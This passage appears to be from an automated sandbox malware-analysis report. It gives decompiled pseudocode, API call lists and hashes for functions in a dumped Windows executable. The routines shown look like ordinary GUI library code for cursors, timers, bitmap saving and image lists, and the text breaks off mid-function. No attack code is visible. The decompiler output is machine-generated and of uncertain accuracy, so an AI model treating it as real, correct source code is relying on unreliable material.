                                                                        0x004410d2
                                                                        0x004410dd
                                                                        0x004410dd
                                                                        0x004410d2
                                                                        0x00000000
                                                                        0x004410c8
                                                                        0x00441068
                                                                        0x00000000
                                                                        0x00440f63

                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 0044115C
                                                                        • SetCursor.USER32(00000000,?,00000000,004412F4), ref: 004411EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Cursor
                                                                        • String ID: <$C
                                                                        • API String ID: 3268636600-3423417450
                                                                        • Opcode ID: 179ed4ee4d19abd0baf6d6ed879b91dc92126d894a0e04a2a6289e9d6702bce5
                                                                        • Instruction ID: 53dfb2be38ad3f3824fe0bc66c4258adf9aa410c39980d357e277dc970e496b8
                                                                        • Opcode Fuzzy Hash: 179ed4ee4d19abd0baf6d6ed879b91dc92126d894a0e04a2a6289e9d6702bce5
                                                                        • Instruction Fuzzy Hash: 81C15E34A00219DFDB10DFA9C585A9EB3F1BF44304F1485A6E900EB365D778EE85CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045FE24, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 276timeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E0045FE24(intOrPtr* __eax, signed int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				signed int _v9;
				signed int _v16;
				signed int _v20;
				char _v21;
				char _v124;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t145;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				signed int _t177;
				signed int _t184;
				intOrPtr _t193;
				signed int _t197;
				signed int _t204;
				intOrPtr _t213;
				intOrPtr _t215;
				signed int _t224;
				signed int _t237;
				signed int _t240;
				void* _t248;
				void* _t252;
				signed int _t253;
				intOrPtr _t268;
				intOrPtr _t284;
				void* _t295;
				signed int _t297;
				intOrPtr _t304;

				_v9 = __ecx;
				_t253 = __edx;
				_v8 = __eax;
				_t294 = _a8;
				_v21 = 0;
				E00460CD8(_v8, __edx, _a8, _t295);
				_t145 = _v8;
				_t305 =  *(_t145 + 0x1c) & 0x00000010;
				if(( *(_t145 + 0x1c) & 0x00000010) != 0) {
					L5:
					__eflags = _t253;
					if(_t253 != 0) {
						L8:
						__eflags = _t253;
						if(_t253 != 0) {
							L37:
							_push(0x4601cf);
							_push( *[fs:eax]);
							 *[fs:eax] = _t304;
							E00437B78(_v8, _t253, _a4, _t294);
							_pop(_t268);
							 *[fs:eax] = _t268;
							return 0;
						}
						E0045D74C(_v8,  &_v124);
						_t296 =  *_v8;
						 *((intOrPtr*)( *_v8 + 0xc8))( &_v124, _v8 + 0x268, _v8 + 0x264, _v8 + 0x260, _v8 + 0x28e);
						__eflags =  *((char*)(_v8 + 0x28e));
						if(__eflags != 0) {
							__eflags =  *((char*)(_v8 + 0x28e)) - 3;
							if(__eflags == 0) {
								_t296 = 0xffc8;
								_t237 = E004037D8(_v8, __eflags);
								__eflags = _t237;
								if(_t237 != 0) {
									_t240 = E00435FB0(_v8) -  *(_v8 + 0x264);
									__eflags = _t240;
									 *(_v8 + 0x264) = _t240;
								}
							}
							return E0045E140(_v8, _t253,  &_v124, _t294, _t296);
						}
						_t259 = _a4;
						E0045D6F0(_v8, _a4, _t294, __eflags,  &_v20,  &_v124);
						_t169 = _v8;
						_t297 = _v20;
						__eflags =  *((intOrPtr*)(_t169 + 0x238)) - _t297;
						if( *((intOrPtr*)(_t169 + 0x238)) > _t297) {
							L25:
							_t171 = _v8;
							__eflags =  *(_t171 + 0x249) & 0x00000001;
							if(( *(_t171 + 0x249) & 0x00000001) == 0) {
								L31:
								_t172 = _v8;
								__eflags =  *(_t172 + 0x249) & 0x00000002;
								if(( *(_t172 + 0x249) & 0x00000002) != 0) {
									__eflags = _v16;
									if(_v16 >= 0) {
										_t173 = _v8;
										__eflags =  *((intOrPtr*)(_t173 + 0x23c)) - _v16;
										if( *((intOrPtr*)(_t173 + 0x23c)) > _v16) {
											__eflags =  *((intOrPtr*)(_v8 + 0x238)) - _v20;
											if(__eflags <= 0) {
												_t177 = _v20;
												 *((intOrPtr*)(_v8 + 0x26c)) = _t177;
												 *((intOrPtr*)(_v8 + 0x270)) = _t177;
												E00412BA4(_t294,  &_v132, _a4, _t294, _t297);
												_push( &_v132);
												_t184 = E004037D8(_v8, __eflags);
												__eflags = _t184;
												if(_t184 != 0) {
													 *((char*)(_v8 + 0x28e)) = 5;
													 *((intOrPtr*)( *_v8 + 0x88))();
													E0045E280(_v8, _t253, _t294, 0xffa3);
													_v21 = 1;
													SetTimer(E0043CC2C(_v8), 1, 0x3c, 0);
												}
											}
										}
									}
								}
								goto L37;
							}
							__eflags = _v20;
							if(_v20 < 0) {
								goto L31;
							}
							_t193 = _v8;
							__eflags =  *((intOrPtr*)(_t193 + 0x238)) - _v20;
							if( *((intOrPtr*)(_t193 + 0x238)) <= _v20) {
								goto L31;
							}
							__eflags =  *((intOrPtr*)(_v8 + 0x23c)) - _v16;
							if(__eflags > 0) {
								goto L31;
							}
							_t197 = _v16;
							 *((intOrPtr*)(_v8 + 0x26c)) = _t197;
							 *((intOrPtr*)(_v8 + 0x270)) = _t197;
							E00412BA4(_t294,  &_v132, _a4, _t294, _t297);
							_push( &_v132);
							_t204 = E004037D8(_v8, __eflags);
							__eflags = _t204;
							if(_t204 != 0) {
								 *((char*)(_v8 + 0x28e)) = 4;
								 *((intOrPtr*)( *_v8 + 0x88))();
								E0045E280(_v8, _t253, _t294, 0xffa2);
								_v21 = 1;
								SetTimer(E0043CC2C(_v8), 1, 0x3c, 0);
							}
							goto L37;
						}
						_t213 = _v8;
						__eflags =  *((intOrPtr*)(_t213 + 0x23c)) - _v16;
						if( *((intOrPtr*)(_t213 + 0x23c)) > _v16) {
							goto L25;
						}
						_t215 = _v8;
						__eflags =  *(_t215 + 0x249) & 0x00000004;
						if(( *(_t215 + 0x249) & 0x00000004) == 0) {
							 *((char*)(_v8 + 0x28e)) = 1;
							SetTimer(E0043CC2C(_v8), 1, 0x3c, 0);
							__eflags = _v9 & 0x00000001;
							if((_v9 & 0x00000001) == 0) {
								E0045EDB8(_v8, _t253, _v16, _t297, _t294, _t297, 1, 1);
							} else {
								E0045ED30(_v8, _t259,  &_v20, _t294);
							}
							goto L37;
						}
						_t284 = _v8;
						_t224 = _v20;
						__eflags =  *((intOrPtr*)(_t284 + 0x228)) - _t224;
						if( *((intOrPtr*)(_t284 + 0x228)) != _t224) {
							L20:
							E0045EDB8(_v8, _t253, _v16, _t224, _t294, _t297, 1, 1);
							E00460DB4(_v8, _t294, _t297);
							L21:
							E004037D8(_v8, __eflags);
							goto L37;
						}
						__eflags =  *((intOrPtr*)(_v8 + 0x22c)) - _v16;
						if(__eflags != 0) {
							goto L20;
						}
						E0045C698(_v8);
						goto L21;
					}
					__eflags = _v9 & 0x00000040;
					if(__eflags == 0) {
						goto L8;
					} else {
						E004037D8(_v8, __eflags);
						goto L37;
					}
				}
				if(E004037D8(_v8, _t305) != 0) {
					L3:
					 *((intOrPtr*)( *_v8 + 0xc0))();
					_t248 = E0045C608(_v8, _t307);
					_t308 = _t248;
					if(_t248 == 0) {
						return E004367E4(_v8, 0, _t308);
					}
					goto L5;
				}
				_t252 = E0044DA34(_v8);
				_t307 = _t252;
				if(_t252 != 0) {
					goto L5;
				}
				goto L3;
			}





































                                                                        0x0045fe2d
                                                                        0x0045fe30
                                                                        0x0045fe32
                                                                        0x0045fe35
                                                                        0x0045fe38
                                                                        0x0045fe3f
                                                                        0x0045fe44
                                                                        0x0045fe47
                                                                        0x0045fe4b
                                                                        0x0045fe8f
                                                                        0x0045fe8f
                                                                        0x0045fe91
                                                                        0x0045feaa
                                                                        0x0045feaa
                                                                        0x0045feac
                                                                        0x004601a5
                                                                        0x004601a8
                                                                        0x004601ad
                                                                        0x004601b0
                                                                        0x004601c0
                                                                        0x004601c7
                                                                        0x004601ca
                                                                        0x00000000
                                                                        0x004601ca
                                                                        0x0045feb8
                                                                        0x0045feed
                                                                        0x0045feef
                                                                        0x0045fef8
                                                                        0x0045feff
                                                                        0x0045ff04
                                                                        0x0045ff0b
                                                                        0x0045ff10
                                                                        0x0045ff14
                                                                        0x0045ff19
                                                                        0x0045ff1b
                                                                        0x0045ff28
                                                                        0x0045ff28
                                                                        0x0045ff31
                                                                        0x0045ff31
                                                                        0x0045ff1b
                                                                        0x00000000
                                                                        0x0045ff3d
                                                                        0x0045ff4f
                                                                        0x0045ff57
                                                                        0x0045ff5c
                                                                        0x0045ff65
                                                                        0x0045ff68
                                                                        0x0045ff6a
                                                                        0x0046002a
                                                                        0x0046002a
                                                                        0x0046002d
                                                                        0x00460034
                                                                        0x004600ee
                                                                        0x004600ee
                                                                        0x004600f1
                                                                        0x004600f8
                                                                        0x004600fe
                                                                        0x00460102
                                                                        0x00460108
                                                                        0x00460111
                                                                        0x00460114
                                                                        0x00460123
                                                                        0x00460126
                                                                        0x0046012b
                                                                        0x0046012e
                                                                        0x00460137
                                                                        0x00460145
                                                                        0x0046014d
                                                                        0x00460167
                                                                        0x0046016c
                                                                        0x0046016e
                                                                        0x00460173
                                                                        0x0046017f
                                                                        0x00460188
                                                                        0x0046018d
                                                                        0x004601a0
                                                                        0x004601a0
                                                                        0x0046016e
                                                                        0x00460126
                                                                        0x00460114
                                                                        0x00460102
                                                                        0x00000000
                                                                        0x004600f8
                                                                        0x0046003a
                                                                        0x0046003e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00460044
                                                                        0x0046004d
                                                                        0x00460050
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046005f
                                                                        0x00460062
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046006b
                                                                        0x0046006e
                                                                        0x00460077
                                                                        0x00460085
                                                                        0x0046008d
                                                                        0x004600a7
                                                                        0x004600ac
                                                                        0x004600ae
                                                                        0x004600b7
                                                                        0x004600c3
                                                                        0x004600cc
                                                                        0x004600d1
                                                                        0x004600e4
                                                                        0x004600e4
                                                                        0x00000000
                                                                        0x004600ae
                                                                        0x0045ff70
                                                                        0x0045ff79
                                                                        0x0045ff7c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045ff82
                                                                        0x0045ff85
                                                                        0x0045ff8c
                                                                        0x0045ffe3
                                                                        0x0045fff9
                                                                        0x0045fffe
                                                                        0x00460002
                                                                        0x00460020
                                                                        0x00460004
                                                                        0x0046000a
                                                                        0x0046000a
                                                                        0x00000000
                                                                        0x00460002
                                                                        0x0045ff8e
                                                                        0x0045ff97
                                                                        0x0045ff9a
                                                                        0x0045ff9c
                                                                        0x0045ffb6
                                                                        0x0045ffc2
                                                                        0x0045ffca
                                                                        0x0045ffcf
                                                                        0x0045ffd6
                                                                        0x00000000
                                                                        0x0045ffd6
                                                                        0x0045ffa7
                                                                        0x0045ffaa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045ffaf
                                                                        0x00000000
                                                                        0x0045ffaf
                                                                        0x0045fe93
                                                                        0x0045fe97
                                                                        0x00000000
                                                                        0x0045fe99
                                                                        0x0045fea0
                                                                        0x00000000
                                                                        0x0045fea0
                                                                        0x0045fe97
                                                                        0x0045fe5b
                                                                        0x0045fe69
                                                                        0x0045fe6e
                                                                        0x0045fe77
                                                                        0x0045fe7c
                                                                        0x0045fe7e
                                                                        0x00000000
                                                                        0x0045fe85
                                                                        0x00000000
                                                                        0x0045fe7e
                                                                        0x0045fe60
                                                                        0x0045fe65
                                                                        0x0045fe67
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045FFF9
                                                                        • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 004600E4
                                                                        • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 004601A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Timer
                                                                        • String ID: @
                                                                        • API String ID: 2870079774-2766056989
                                                                        • Opcode ID: 88cef14bf29f28469dc2bd1fd5b87344eff30f37b517dbfd76d085cff1a4e1cb
                                                                        • Instruction ID: ca72aae42d446a3379f6ca7453f2662bbf2d4cae35f29f2d7e84bd41c12cedf4
                                                                        • Opcode Fuzzy Hash: 88cef14bf29f28469dc2bd1fd5b87344eff30f37b517dbfd76d085cff1a4e1cb
                                                                        • Instruction Fuzzy Hash: CCC14A34A04208EFDB00DB99C985FDEB7F5AF09304F2441A6E844AB392DB79AF45DB45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004258E4, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 203COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004258E4(void* __eax, signed int __ecx, intOrPtr* __edx, void* __eflags) {
				void* __ebp;
				signed int _t93;
				void* _t108;
				signed int _t114;
				void* _t125;
				signed int _t140;
				signed int _t146;
				signed int _t160;
				intOrPtr _t197;
				intOrPtr* _t201;
				void* _t202;
				intOrPtr _t204;
				signed int* _t205;

				_t160 = __ecx;
				_t201 = __edx;
				_t202 = __eax;
				E00402EF0( &(_t205[4]), 0xe);
				_t205[4] = 0x4d42;
				_t203 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c));
				if( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c)) != 0) {
					 *_t205 = E0041694C(_t203);
					if(_t160 != 0) {
						E00416B7C(_t201, 4, _t205);
					}
					E0041694C( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c)));
					return  *((intOrPtr*)( *_t201 + 0xc))();
				}
				E004249D0(_t202, 0xe);
				_t204 =  *((intOrPtr*)(_t202 + 0x28));
				 *_t205 = 0;
				_t93 =  *(_t204 + 0x14);
				__eflags = _t93;
				if(__eflags != 0) {
					 *_t205 =  *_t205 + _t205[2] + 0xe;
					E00402EF0( &(_t205[4]), 0xe);
					_t205[4] = 0x4d42;
					_t125 = E00424894(_t202);
					_t197 =  *0x425b98; // 0x1
					E00420804(_t125, 0, _t197);
					_t205[3] = E00420B28(SelectObject( *( *((intOrPtr*)(_t202 + 0x2c)) + 4),  *(_t204 + 0x14)));
					_t205[1] = GetDIBColorTable( *( *((intOrPtr*)(_t202 + 0x2c)) + 4), 0, 0x100,  &(_t205[0xa]));
					SelectObject( *( *((intOrPtr*)(_t202 + 0x2c)) + 4), _t205[3]);
					_t140 =  *(_t204 + 0x50);
					__eflags = _t140;
					if(_t140 > 0) {
						__eflags = _t140 - _t205[1];
						if(_t140 < _t205[1]) {
							_t205[1] = _t140;
						}
					}
					__eflags =  *((char*)(_t204 + 0x70));
					if( *((char*)(_t204 + 0x70)) == 0) {
						__eflags = _t205[1];
						if(_t205[1] == 0) {
							__eflags =  *(_t204 + 0x10);
							if( *(_t204 + 0x10) != 0) {
								__eflags =  *((char*)(_t204 + 0x71));
								if( *((char*)(_t204 + 0x71)) == 0) {
									_t205[1] = E004212BC( *(_t204 + 0x10), 0xff,  &(_t205[0xa]));
									__eflags =  *((short*)(_t204 + 0x3e)) - 8;
									if( *((short*)(_t204 + 0x3e)) > 8) {
										_t146 = _t205[1] << 2;
										 *_t205 =  *_t205 + _t146;
										_t47 =  &(_t205[2]);
										 *_t47 = _t205[2] + _t146;
										__eflags =  *_t47;
									}
								}
							}
						}
					}
					_t205[4] =  *_t205;
					_t93 = _t205[2] + 0xe;
					__eflags = _t93;
					_t205[6] = _t93;
				}
				__eflags = _t160;
				if(_t160 != 0) {
					_t93 = E00416B7C(_t201, 4, _t205);
				}
				__eflags =  *_t205;
				if( *_t205 == 0) {
					return _t93;
				} else {
					E004239AC(_t204 + 0x18);
					__eflags = _t205[1];
					if(_t205[1] == 0) {
						L27:
						__eflags =  *((char*)(_t204 + 0x70));
						if( *((char*)(_t204 + 0x70)) == 0) {
							E00416B7C(_t201, 0xe,  &(_t205[4]));
							E00416B7C(_t201, 0x28, _t204 + 0x30);
							__eflags =  *((short*)(_t204 + 0x3e)) - 8;
							if( *((short*)(_t204 + 0x3e)) > 8) {
								__eflags =  *(_t204 + 0x40) & 0x00000003;
								if(( *(_t204 + 0x40) & 0x00000003) != 0) {
									E00416B7C(_t201, 0xc, _t204 + 0x58);
								}
							}
						} else {
							_t108 = _t204 + 0x30;
							_t205[7] = 0xc;
							_t205[8] =  *((intOrPtr*)(_t108 + 4));
							_t205[9] =  *((intOrPtr*)(_t108 + 8));
							_t205[9] = 1;
							_t205[0xa].rgbBlue =  *((intOrPtr*)(_t108 + 0xe));
							E00416B7C(_t201, 0xe,  &(_t205[4]));
							E00416B7C(_t201, 0xc,  &(_t205[7]));
						}
						__eflags = 0 * _t205[1];
						E00416B7C(_t201, 0 * _t205[1],  &(_t205[0xa]));
						return E00416B7C(_t201,  *((intOrPtr*)(_t204 + 0x44)),  *((intOrPtr*)(_t204 + 0x2c)));
					}
					_t114 =  *(_t204 + 0x50);
					__eflags = _t114;
					if(_t114 == 0) {
						L24:
						 *(_t204 + 0x50) = _t205[1];
						L25:
						__eflags =  *((char*)(_t204 + 0x70));
						if( *((char*)(_t204 + 0x70)) != 0) {
							E00420F98( &(_t205[0xa]),  &(_t205[1]));
						}
						goto L27;
					}
					__eflags = _t114 - _t205[1];
					if(_t114 == _t205[1]) {
						goto L25;
					}
					goto L24;
				}
			}
















                                                                        0x004258ee
                                                                        0x004258f0
                                                                        0x004258f2
                                                                        0x004258ff
                                                                        0x00425904
                                                                        0x0042590e
                                                                        0x00425913
                                                                        0x0042591c
                                                                        0x00425921
                                                                        0x0042592c
                                                                        0x0042592c
                                                                        0x00425939
                                                                        0x00000000
                                                                        0x00425947
                                                                        0x00425951
                                                                        0x00425956
                                                                        0x0042595b
                                                                        0x0042595e
                                                                        0x00425961
                                                                        0x00425963
                                                                        0x004259a9
                                                                        0x004259b7
                                                                        0x004259bc
                                                                        0x004259c5
                                                                        0x004259ca
                                                                        0x004259d0
                                                                        0x004259ea
                                                                        0x00425a06
                                                                        0x00425a16
                                                                        0x00425a1b
                                                                        0x00425a1e
                                                                        0x00425a20
                                                                        0x00425a22
                                                                        0x00425a26
                                                                        0x00425a28
                                                                        0x00425a28
                                                                        0x00425a26
                                                                        0x00425a2c
                                                                        0x00425a30
                                                                        0x00425a32
                                                                        0x00425a37
                                                                        0x00425a39
                                                                        0x00425a3d
                                                                        0x00425a3f
                                                                        0x00425a43
                                                                        0x00425a56
                                                                        0x00425a5a
                                                                        0x00425a5f
                                                                        0x00425a65
                                                                        0x00425a68
                                                                        0x00425a6b
                                                                        0x00425a6b
                                                                        0x00425a6b
                                                                        0x00425a6b
                                                                        0x00425a5f
                                                                        0x00425a43
                                                                        0x00425a3d
                                                                        0x00425a37
                                                                        0x00425a72
                                                                        0x00425a7a
                                                                        0x00425a7a
                                                                        0x00425a7d
                                                                        0x00425a7d
                                                                        0x00425a81
                                                                        0x00425a83
                                                                        0x00425a8e
                                                                        0x00425a8e
                                                                        0x00425a93
                                                                        0x00425a97
                                                                        0x00425b97
                                                                        0x00425a9d
                                                                        0x00425aa0
                                                                        0x00425aa5
                                                                        0x00425aaa
                                                                        0x00425ad3
                                                                        0x00425ad3
                                                                        0x00425ad7
                                                                        0x00425b33
                                                                        0x00425b42
                                                                        0x00425b47
                                                                        0x00425b4c
                                                                        0x00425b4e
                                                                        0x00425b52
                                                                        0x00425b5e
                                                                        0x00425b5e
                                                                        0x00425b52
                                                                        0x00425ad9
                                                                        0x00425ad9
                                                                        0x00425adc
                                                                        0x00425ae8
                                                                        0x00425af1
                                                                        0x00425af6
                                                                        0x00425b01
                                                                        0x00425b11
                                                                        0x00425b21
                                                                        0x00425b21
                                                                        0x00425b70
                                                                        0x00425b7b
                                                                        0x00000000
                                                                        0x00425b88
                                                                        0x00425aac
                                                                        0x00425aaf
                                                                        0x00425ab1
                                                                        0x00425ab9
                                                                        0x00425abd
                                                                        0x00425ac0
                                                                        0x00425ac0
                                                                        0x00425ac4
                                                                        0x00425ace
                                                                        0x00425ace
                                                                        0x00000000
                                                                        0x00425ac4
                                                                        0x00425ab3
                                                                        0x00425ab7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00425ab7

                                                                        APIs
                                                                        • SelectObject.GDI32(?,?), ref: 004259E0
                                                                        • GetDIBColorTable.GDI32(?,00000000,00000100,?,?,?), ref: 00425A01
                                                                        • SelectObject.GDI32(?,?), ref: 00425A16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ObjectSelect$ColorTable
                                                                        • String ID: BM
                                                                        • API String ID: 2377976745-2348483157
                                                                        • Opcode ID: 8bd2cb56597fdf506e5766ef7ca11344766f88f5d25333770e39b42100c0256a
                                                                        • Instruction ID: 6c74de65949b55c7261e36db3c671f3cf5b5c64a81c24a0a4976f9b404168564
                                                                        • Opcode Fuzzy Hash: 8bd2cb56597fdf506e5766ef7ca11344766f88f5d25333770e39b42100c0256a
                                                                        • Instruction Fuzzy Hash: BC8116707083559BD710EF28D485BAE77E1AF88314F44892EF889CB391D778E985CB4A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00443A2C, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E00443A2C(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				char _v24;
				char _v28;
				intOrPtr _t60;
				void* _t102;
				intOrPtr _t106;
				void* _t112;
				intOrPtr _t126;
				intOrPtr _t141;
				void* _t148;
				void* _t149;
				intOrPtr _t150;

				_t148 = _t149;
				_t150 = _t149 + 0xffffffe8;
				_push(__ebx);
				_push(__esi);
				_v28 = 0;
				_v24 = 0;
				_t112 = __edx;
				_v8 = __eax;
				_push(_t148);
				_push(0x443c43);
				_push( *[fs:eax]);
				 *[fs:eax] = _t150;
				if(E00443514(_v8) == 0) {
					L6:
					E004037D8(_v8, __eflags);
					__eflags = 0;
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x443c4a);
					return E0040436C( &_v28, 2);
				} else {
					E004442B8(_v8, __edx, __ecx, __ecx, __ecx);
					_v12 = E004438EC(_v8, __edx, _a4, __ecx, __ecx);
					if(_v12 == 0xffffffff) {
						_t60 =  *0x4958fc; // 0x41d54c
						E00406548(_t60,  &_v28);
						E0040A17C(_v28, 1);
						E00403DA8();
						goto L6;
					} else {
						 *[fs:eax] = _t150;
						_v16 = E004242CC(1);
						 *[fs:eax] = _t150;
						 *((intOrPtr*)( *_v16 + 0x34))( *[fs:eax], 0x443bd4, _t148,  *[fs:eax], 0x443bf4, _t148);
						 *((intOrPtr*)( *_v16 + 0x40))();
						_v20 = E004242CC(1);
						 *[fs:eax] = _t150;
						E004256E4(_v20, 1);
						 *((intOrPtr*)( *_v20 + 0x34))( *[fs:eax], 0x443bb7, _t148);
						 *((intOrPtr*)( *_v20 + 0x40))();
						L00426AD8();
						L00426AD8();
						_push( *((intOrPtr*)( *_v16 + 0x64))( *((intOrPtr*)( *_v20 + 0x64))(E004436E8(_v8), _v12, E00420730(E00424894(_v20)), 0, 0, 0x10, E004436E8(_v8), _v12, E00420730(E00424894(_v16)), 0, 0, 0)));
						_push(_t112);
						_t102 = E004436E8(_v8);
						_push(_t102);
						L00426AE0();
						if(_t102 == 0) {
							_t106 =  *0x4958fc; // 0x41d54c
							E00406548(_t106,  &_v24);
							E0040A17C(_v24, 1);
							E00403DA8();
						}
						_pop(_t141);
						 *[fs:eax] = _t141;
						_push(0x443bbe);
						return E004035DC(_v20);
					}
				}
			}


















                                                                        0x00443a2d
                                                                        0x00443a2f
                                                                        0x00443a32
                                                                        0x00443a33
                                                                        0x00443a36
                                                                        0x00443a39
                                                                        0x00443a3e
                                                                        0x00443a40
                                                                        0x00443a45
                                                                        0x00443a46
                                                                        0x00443a4b
                                                                        0x00443a4e
                                                                        0x00443a5b
                                                                        0x00443c1c
                                                                        0x00443c23
                                                                        0x00443c28
                                                                        0x00443c2a
                                                                        0x00443c2d
                                                                        0x00443c30
                                                                        0x00443c42
                                                                        0x00443a61
                                                                        0x00443a66
                                                                        0x00443a78
                                                                        0x00443a7f
                                                                        0x00443bfe
                                                                        0x00443c03
                                                                        0x00443c12
                                                                        0x00443c17
                                                                        0x00000000
                                                                        0x00443a85
                                                                        0x00443a90
                                                                        0x00443a9f
                                                                        0x00443aad
                                                                        0x00443abb
                                                                        0x00443ac9
                                                                        0x00443ad8
                                                                        0x00443ae6
                                                                        0x00443aee
                                                                        0x00443afe
                                                                        0x00443b0c
                                                                        0x00443b30
                                                                        0x00443b56
                                                                        0x00443b6c
                                                                        0x00443b6d
                                                                        0x00443b71
                                                                        0x00443b76
                                                                        0x00443b77
                                                                        0x00443b7e
                                                                        0x00443b83
                                                                        0x00443b88
                                                                        0x00443b97
                                                                        0x00443b9c
                                                                        0x00443b9c
                                                                        0x00443ba3
                                                                        0x00443ba6
                                                                        0x00443ba9
                                                                        0x00443bb6
                                                                        0x00443bb6
                                                                        0x00443a7f

                                                                        APIs
                                                                          • Part of subcall function 004438EC: 734520C0.COMCTL32(?,00000000,00000000,?,00000000,004439EB), ref: 0044398F
                                                                        • 73452500.COMCTL32(00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00443BF4,?,00000000,00443C43), ref: 00443B30
                                                                        • 73452500.COMCTL32(00000000,000000FF,00000000,00000000,00000000,00000010,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00443BF4), ref: 00443B56
                                                                        • 73452330.COMCTL32(00000000,?,00000000,?,?,00000000,00443BF4,?,00000000,00443C43), ref: 00443B77
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 73452500$73452073452330LoadString
                                                                        • String ID: DA
                                                                        • API String ID: 579128689-2080325668
                                                                        • Opcode ID: d992737f7190e42f1d92079056fb4a6d15802b062724c07b44b65551e02e38d2
                                                                        • Instruction ID: d8424a2b104fe4f1d5b96f464bae46b84877e40d637dfa1592dbc8658c5b6140
                                                                        • Opcode Fuzzy Hash: d992737f7190e42f1d92079056fb4a6d15802b062724c07b44b65551e02e38d2
                                                                        • Instruction Fuzzy Hash: 79511074A00215EFD700EFA9D892E9DB7F5FF49705F6144A6F800AB761CA35AE00DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409D0C, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E00409D0C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
